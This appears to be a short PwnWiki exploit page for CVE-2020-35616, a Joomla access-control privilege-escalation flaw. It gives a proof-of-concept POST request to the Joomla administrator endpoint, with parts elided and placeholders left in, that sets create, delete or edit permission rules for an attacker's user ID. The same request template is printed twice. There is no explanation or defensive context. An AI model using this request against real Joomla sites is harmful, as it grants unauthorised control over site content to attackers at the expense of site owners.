CVE-2020-35616 Joomla ACL Privilege Escalation漏洞
From PwnWiki
POC
POST administrator/index.php?option={Target Category}
...
...
...
&jform[rules][core.{create|delete|edit}][AttackerID]=1
POST administrator/index.php?option={Target Category}
...
...
...
&jform[rules][core.{create|delete|edit}][AttackerID]=1